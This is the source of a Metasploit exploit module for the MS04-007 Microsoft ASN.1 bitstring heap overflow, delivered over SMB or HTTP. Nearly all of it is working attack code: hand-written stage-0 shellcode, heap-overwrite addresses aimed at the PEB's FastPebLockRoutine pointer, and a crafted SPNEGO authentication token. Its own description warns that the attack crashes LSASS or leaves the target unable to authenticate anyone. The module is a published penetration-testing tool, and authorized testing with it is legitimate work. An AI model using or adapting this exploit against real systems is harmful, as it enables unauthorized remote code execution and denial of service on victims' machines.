Path: blob/master/modules/exploits/windows/smb/ms04_007_killbill.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = LowRanking78include Msf::Exploit::Remote::SMB::Client910def initialize(info = {})11super(12update_info(13info,14'Name' => 'MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow',15'Description' => %q{16This is an exploit for a previously undisclosed17vulnerability in the bit string decoding code in the18Microsoft ASN.1 library. This vulnerability is not related19to the bit string vulnerability described in eEye advisory20AD20040210-2. Both vulnerabilities were fixed in the21MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this22vulnerability.2324You are only allowed one attempt with this vulnerability. If25the payload fails to execute, the LSASS system service will26crash and the target system will automatically reboot itself27in 60 seconds. If the payload succeeds, the system will no28longer be able to process authentication requests, denying29all attempts to login through SMB or at the console. A30reboot is required to restore proper functioning of an31exploited system.3233This exploit has been successfully tested with the win32/*/reverse_tcp34payloads, however a few problems were encountered when using the35equivalent bind payloads. Your mileage may vary.36},37'Author' => [ 'Solar Eclipse <solareclipse[at]phreedom.org>' ],38'License' => BSD_LICENSE,39'References' => [40[ 'CVE', '2003-0818'],41[ 'OSVDB', '3902' ],42[ 'BID', '9633'],43[ 'MSB', 'MS04-007'],44],45'DefaultOptions' => {46'EXITFUNC' => 'thread'47},48'Privileged' => true,49'Payload' => {50'Space' => 1024,51'StackAdjustment' => -3500,52},53'Platform' => 'win',54'Targets' => [55[56'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)57{58'Platform' => 'win',59},60],61],62'Notes' => {63'AKA' => [ 'kill-bill' ],64'Reliability' => [ UNRELIABLE_SESSION ],65'Stability' => [ CRASH_OS_RESTARTS, CRASH_SERVICE_DOWN ],66'SideEffects' => UNKNOWN_SIDE_EFFECTS67},68'DisclosureDate' => '2004-02-10',69'DefaultTarget' => 070)71)7273register_options [74OptEnum.new('PROTO', [true, 'Which protocol to use', 'smb', %w[smb http]]),75]7677deregister_options('SMB::ProtocolVersion')78end7980# This exploit is too destructive to use during automated exploitation.81# Better Windows-based exploits exist at this time (Sep 2006)82def autofilter83false84end8586# This is a straight port of Solar Eclipse's "kill-bill" exploit, published87# as a Metasploit Framework module with his permission. This module is only88# licensed under GPLv2, keep this in mind if you embed the Framework into89# a non-GPL application. -hdm[at]metasploit.com9091def exploit92# The first stage shellcode fixes the PEB pointer and cleans the heap93stage0 =94"\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff" +95"\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2" +96"\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00" +97"\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c" +98"\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89" +99"\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31" +100"\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4" +101"\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24" +102"\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81" +103"\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3" +104"\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31" +105"\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64" +106"\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08" +107"\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74" +108"\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb" +109"\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd" +110"\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46" +111"\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea" +112"\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee" +113"\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +114"\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b" +115"\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2" +116"\x08\x00\xeb\xfe"117118token = spnego_token(stage0, payload.encoded)119120case datastore['PROTO']121when 'smb'122exploit_smb(token)123when 'http'124exploit_http(token)125else126print_status("Invalid application protocol specified, use smb or http")127end128end129130def exploit_smb(token)131connect(versions: [1])132133client = Rex::Proto::SMB::Client.new(sock)134135begin136client.session_request(smb_hostname()) if not datastore['SMBDirect']137client.negotiate138client.session_setup_with_ntlmssp_blob(token)139rescue => e140if (e.to_s =~ /error code 0x00050001/)141print_error("The target system has already been exploited")142else143print_error("Error: #{e}")144end145end146147handler148disconnect149end150151def exploit_http(token)152connect(versions: [1])153154req = "GET / HTTP/1.0\r\n"155req << "Host: #{datastore['RHOST']}\r\n"156req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n"157158sock.put(req)159res = sock.get_once160161if (res and res =~ /0x80090301/)162print_error("This server does not support the Negotiate protocol or has already been exploited")163end164165if (res and res =~ /0x80090304/)166print_error("This server responded with error code 0x80090304 (wth?)")167end168169handler170disconnect171end172173# Returns an ASN.1 encoded string174def enc_asn1(str)175Rex::Proto::NTLM::Utils::asn1encode(str)176end177178# Returns an ASN.1 encoded bit string with 0 unused bits179def enc_bits(str)180"\x03" + enc_asn1("\x00" + str)181end182183# Returns a BER encoded constructed bit string184def enc_constr(*str_arr)185"\x23" + enc_asn1(str_arr.join(''))186end187188# Returns a BER encoded SPNEGO token189def spnego_token(stage0, stage1)190if !(stage0 and stage1)191print_status("Invalid parameters passed to spnego_token")192return193end194195if (stage0.length > 1032)196print_status("The stage 0 shellcode is longer than 1032 bytes")197return198end199200tag = "\x90\x42\x90\x42\x90\x42\x90\x42"201202if ((tag.length + stage1.length) > 1033)203print_status("The stage 1 shellcode is too long")204return205end206207# The first two overwrites must succeed, so we write to an unused location208# in the PEB block. We don't care about the values, because after this the209# doubly linked list of free blocks is corrupted and we get to the second210# overwrite which is more useful.211212fw = "\xf8\x0f\x01\x00" # 0x00010ff8213bk = "\xf8\x0f\x01"214215# The second overwrite writes the address of our shellcode into the216# FastPebLockRoutine pointer in the PEB217218peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB219220bitstring = enc_constr(221enc_bits("A" * 1024),222"\x03\x00",223enc_constr(224enc_bits(tag + stage1 + ("B" * (1033 - (tag + stage1).length))),225enc_constr(enc_bits(fw + bk)),226enc_constr(227enc_bits("CCCC" + peblock + stage0 + ("C" * (1032 - stage0.length))),228enc_constr(229enc_bits("\xeb\x06" + make_nops(6)),230enc_bits("D" * 1040)231)232)233)234)235236token = "\x60" + enc_asn1( # Application Constructed Object237"\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID238"\xa0" + enc_asn1( # NegTokenInit (0xa0)239"\x30" + enc_asn1(240"\xa1" + enc_asn1(241bitstring242)243)244)245)246247return token248end249end250251252